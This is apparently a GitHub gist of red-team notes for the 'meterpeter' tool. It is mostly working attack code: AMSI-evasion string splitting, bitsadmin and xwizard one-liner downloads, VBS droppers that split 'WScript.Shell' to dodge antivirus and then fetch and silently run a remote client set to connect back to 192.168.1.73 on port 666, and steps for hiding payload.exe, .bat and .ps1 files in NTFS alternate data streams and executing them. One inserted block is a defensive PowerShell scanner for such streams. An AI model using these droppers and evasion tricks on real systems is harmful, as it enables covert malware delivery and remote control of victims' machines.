@r00t-3xp10it
Last active March 11, 2021 14:08
meterpeter updates
meterpeter new updates

r00t-3xp10it commented Sep 14, 2020

For example, it will take a string like ... New-Object System.Net.Sockets.TCPClient ... and convert it to:

$a = "Syste"
$b = "m.Net.Soc"
$c = "kets.TCP"
$d = "Client"

... New-Object $a$b$c$d ...

Another example:

$zvlOGdEJVsPNBDwfKFWpvFYvlgJXDvIUgTnQ = "b`y"
$kjEbjGhcfGYxfdIOzgvYTE.kjGTFhAfdUsjxIPbk = "pa`s`s"

amsi script.block signatures: https://github.com/PowerShell/PowerShell/blob/v6.0.0-alpha.18/src/System.Management.Automation/engine/runtime/CompiledScriptBlock.cs#L1612-L1660


r00t-3xp10it commented Sep 17, 2020

One-liner download

bitsadmin /transfer hackingarticles http://192.168.1.13/ignite.png C:\Users\pedro\Desktop\ignite.png
start xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/2305mJkp && timeout 6 && taskkill /F /IM xwizard.exe >NUL

Download with VBS API

  • dropper.vbs (replace Objshell.Run API flagged by AV)
CreateObject("WS"+"cri"+"pt.Sh"+"ell").Exec "powershell -exec bypass -w 1 -C (NeW-Object Net.WebClient).DownloadFile('https://github.com/r00t-3xp10it/venom/blob/master/bin/Client.exe', '%tmp%\\Client.exe')" 
CreateObject("WS"+"cri"+"pt.Sh"+"ell").Exec "powershell Start-Process -windowstyle hidden -FilePath '%tmp%\\Client.exe' -ArgumentList 'ip=192.168.1.73','port=666'"


r00t-3xp10it commented Sep 17, 2020

Alternate data streams (ADS)


What are Alternate Data Streams?
Alternate Data Streams (ADS) have been around since the introduction of Windows NTFS. They were designed to provide
compatibility with the old Hierarchical File System (HFS) from Mac, which uses something called resource forks.

Basically, ADS can be used to hide the presence of a secret or malicious file inside the file record of an innocent file. That is,
when Windows shows you a file, say "readme.txt", the metadata that tells your system where to get "readme.txt" may also
contain information for "EvilSpyware.exe". Thus, malicious files may be on your system and you cannot see them using normal means.


How to see Alternate Data Stream records in the CLI?

dir /r



Proof-Of-Concept


  • Create one text file to be embedded with one jpg image
echo test if it works > SSAredTeam.txt
  • Download kali-linux.jpg
    [image: Kali-linux]

  • Append the image file to the text file

type kali-linux.jpg > SSAredTeam.txt:kali-linux.jpg
  • Delete kali-linux.jpg image
del kali-linux.jpg
  • see ads
dir /r
  • Execute kali-linux.jpg image
mspaint.exe C:\Users\pedro\Desktop\SSAredTeam.txt:kali-linux.jpg

[image: ads]



Hide an mp3 in a text file

  • Create one text file to be embedded with one mp3 file
echo test if it works > SSAredTeam.txt
  • Append the mp3 file to the text file
type mysong.mp3 > SSAredTeam.txt:mysong.mp3
  • Delete mysong mp3
del mysong.mp3
  • see ads
dir /r
  • Execute mysong.mp3 (ads)
wmplayer.exe C:\Users\pedro\Desktop\SSAredTeam.txt:mysong.mp3



Hide an exe in a text file

  • Create one text file to be embedded with one exe file
echo test if it works > SSAredTeam.txt
  • Append the exe file to the text file
type payload.exe > SSAredTeam.txt:payload.exe
  • Delete payload exe
del payload.exe
  • see ads
dir /r
  • Execute payload.exe (ads)
wmic.exe process call create "C:\Users\pedro\Desktop\SSAredTeam.txt:payload.exe"




  • Execute payload.bat stored in an Alternate Data Stream (ADS).
cmd.exe - < SSAredTeam.txt:payload.bat

[image: ADS]



  • Execute payload.ps1 stored in an Alternate Data Stream (ADS).
powershell .\SSAredTeam.txt:payload.ps1

[image: ads2]

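A defender-side counterpart to the `dir /r` check in the ADS comment above, added here as an example and not code from the gist: it walks a directory with PowerShell, lists every stream other than the file's own `:$DATA` content, and flags streams whose name ends in an executable or script extension or whose first two bytes are the `MZ` PE signature (so a payload hidden under a harmless-looking stream name is still caught). The start path, the ignore list and the extension list are assumptions for this example; `Get-Item -Stream`, `Get-Content -Stream` and `Remove-Item -Stream` are standard FileSystem provider parameters on Windows (PowerShell 3 and later).

```powershell
# Added example (not from the gist): enumerate NTFS alternate data streams under a
# directory and report the ones a defender would want to look at. Assumes Windows
# PowerShell 3+ or PowerShell 7 on an NTFS volume. The start path, the ignore list
# and the extension list below are assumptions for this example.
param(
    [string]   $Path = "$env:USERPROFILE\Desktop",
    # Zone.Identifier is the Mark-of-the-Web stream that browsers add to downloads;
    # it is benign and very common, so it is skipped by default.
    [string[]] $IgnoreStreams = @('Zone.Identifier'),
    [string[]] $SuspiciousExtensions = @('.exe', '.dll', '.scr', '.bat', '.cmd', '.ps1', '.vbs', '.js', '.hta')
)

function Test-PeHeader {
    # Returns $true when the first two bytes of the named stream are 'MZ', the PE
    # signature, which catches an executable hidden under a non-executable stream name.
    param([string] $FilePath, [string] $StreamName)
    try {
        if ($PSVersionTable.PSVersion.Major -ge 6) {
            # PowerShell 7 replaced -Encoding Byte with -AsByteStream
            $bytes = Get-Content -LiteralPath $FilePath -Stream $StreamName -AsByteStream -TotalCount 2 -ErrorAction Stop
        } else {
            $bytes = Get-Content -LiteralPath $FilePath -Stream $StreamName -Encoding Byte -TotalCount 2 -ErrorAction Stop
        }
        return ($bytes.Count -eq 2 -and $bytes[0] -eq 0x4D -and $bytes[1] -eq 0x5A)
    } catch {
        # unreadable or empty stream: treat as "not a PE" rather than aborting the scan
        return $false
    }
}

$findings = foreach ($file in Get-ChildItem -LiteralPath $Path -File -Recurse -Force -ErrorAction SilentlyContinue) {
    # -Stream * lists every stream of the file; ':$DATA' is the file's own visible content
    $streams = Get-Item -LiteralPath $file.FullName -Stream * -ErrorAction SilentlyContinue |
        Where-Object { $_.Stream -ne ':$DATA' -and $IgnoreStreams -notcontains $_.Stream }

    foreach ($s in $streams) {
        $ext = [System.IO.Path]::GetExtension($s.Stream).ToLowerInvariant()
        [pscustomobject]@{
            File       = $file.FullName
            Stream     = $s.Stream
            Bytes      = $s.Length
            SuspectExt = $SuspiciousExtensions -contains $ext
            IsPE       = Test-PeHeader -FilePath $file.FullName -StreamName $s.Stream
        }
    }
}

# Suspicious entries first. An empty table means no non-default streams outside the
# ignore list exist under $Path.
$findings |
    Sort-Object -Property @{ Expression = { $_.IsPE -or $_.SuspectExt }; Descending = $true }, File |
    Format-Table -AutoSize
```

Run it as `.\Find-Ads.ps1 -Path C:\Users\pedro\Desktop` (script name assumed) and the `SSAredTeam.txt` file from the proof of concept shows up with its `kali-linux.jpg`, `mysong.mp3` or `payload.exe` stream; the `payload.exe` row is marked both `SuspectExt` and `IsPE`. Once a stream has been confirmed as unwanted it can be dropped without touching the host file with `Remove-Item -LiteralPath <file> -Stream <name>`, and the same `Get-Item -Stream *` call makes a cheap periodic baseline for directories where hidden streams should never appear.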

r00t-3xp10it commented Sep 17, 2020

Download files using VBS

' Set your url settings and the saving options
strFileURL = "https://github.com/r00t-3xp10it/venom/blob/master/bin/Client.exe"
strHDLocation = "C:\Users\pedro\Desktop\Client.exe"

Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()

If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary

objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0    'Set the stream position to the start

Set objFSO = Createobject("Scripting.FileSystemObject")
if objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing

objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if

Set objXMLHTTP = Nothing
x=MsgBox("File Successfully Downloaded" & vbCrLf & "Storage: C:\Users\pedro\Desktop\Client.exe",64,"VBS Downloader")
CreateObject("WScript.Shell").Exec "cmd /R start /min Client.exe ip=192.168.1.73 port=666"

@r00t-3xp10it

[image: av3]
